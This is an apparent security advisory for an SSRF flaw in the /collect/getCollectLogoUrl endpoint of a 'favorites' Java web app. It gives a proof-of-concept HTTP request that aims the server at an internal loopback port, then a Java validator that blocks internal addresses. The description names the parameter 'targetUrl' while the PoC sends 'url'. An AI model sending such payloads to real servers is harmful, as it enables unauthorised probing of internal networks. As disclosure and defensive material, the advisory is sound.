### Key Information

#### Vulnerability Type

- SSRF (Server-Side Request Forgery)

#### Affected Versions

- <= v1.3.0

#### Vulnerability Description

- An SSRF vulnerability was discovered on the `/collect/getCollectLogoUrl` endpoint.
- The `targetUrl` parameter is user-controllable and lacks sufficient security validation during network requests, leading to the SSRF vulnerability.
- Attackers can exploit this vulnerability to probe and abuse internal services of the target system.

#### Vulnerable Code Locations

- `app/src/main/java/com/favorites/web/CollectController.java`
- `app/src/main/java/com/favorites/utils/HtmlUtil.java`

#### POC (Proof of Concept)

```http
POST /collect/getCollectLogoUrl HTTP/1.1
Host: 127.0.0.1:7080
Content-Type: application/json;charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.88 Safari/537.36
Connection: close
Content-Length: 30

{"url":"http://127.0.0.1:88/"}
```

#### Impact

- The SSRF vulnerability may allow attackers to access internal network resources, leading to data leakage, system compromise, and other severe consequences.
- Reference: https://portswigger.net/web-security/ssrf/what-is-the-impact-of-ssrf-attacks
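The kind of destination check the vulnerable endpoint is missing, as an added example (Java 9+) and not code from the favorites project: `SafeUrlValidator` and its methods are hypothetical names, and the routine rejects the PoC's loopback target and other non-public destinations before any fetch by `HtmlUtil` would take place.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.UnknownHostException;
import java.util.Set;

// Hypothetical guard (added example, not the project's code) that CollectController
// could apply to the user-supplied URL. Allow-listing hosts is stronger; this is the
// minimal block-list check the advisory says is absent.
public final class SafeUrlValidator {
    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");

    /** True only if the URL is http(s) and every address it resolves to is public. */
    public static boolean isSafe(String rawUrl) {
        URI uri;
        try { uri = new URI(rawUrl); } catch (Exception e) { return false; } // bad syntax or null
        String scheme = uri.getScheme();
        String host = uri.getHost();      // null for file:///, mailto:, or a malformed authority
        if (scheme == null || host == null || !ALLOWED_SCHEMES.contains(scheme.toLowerCase())) {
            return false;
        }
        try {
            // Check every A/AAAA record: one private record beside a public one
            // still fails, which blunts round-robin and rebinding tricks.
            for (InetAddress addr : InetAddress.getAllByName(host)) {
                if (isInternal(addr)) return false;
            }
        } catch (UnknownHostException e) {
            return false;
        }
        return true;
    }

    static boolean isInternal(InetAddress a) {
        byte[] raw = a.getAddress();
        boolean uniqueLocalV6 = raw.length == 16 && (raw[0] & 0xfe) == 0xfc; // fc00::/7
        return a.isLoopbackAddress()      // 127.0.0.0/8, ::1
            || a.isAnyLocalAddress()      // 0.0.0.0, ::
            || a.isSiteLocalAddress()     // 10/8, 172.16/12, 192.168/16, fec0::/10
            || a.isLinkLocalAddress()     // 169.254/16 (cloud metadata), fe80::/10
            || a.isMulticastAddress()
            || uniqueLocalV6;             // not covered by isSiteLocalAddress()
    }

    public static void main(String[] args) {
        // The advisory's PoC target, a loopback port, must be refused.
        System.out.println("PoC URL accepted? " + isSafe("http://127.0.0.1:88/"));
        System.out.println("IPv6 loopback accepted? " + isSafe("http://[::1]:7080/"));
    }
}
```

Even with this check in place the fetching code must not follow redirects automatically and should connect to the address that was validated, otherwise a redirect or a second DNS resolution can still steer the request back inside the network.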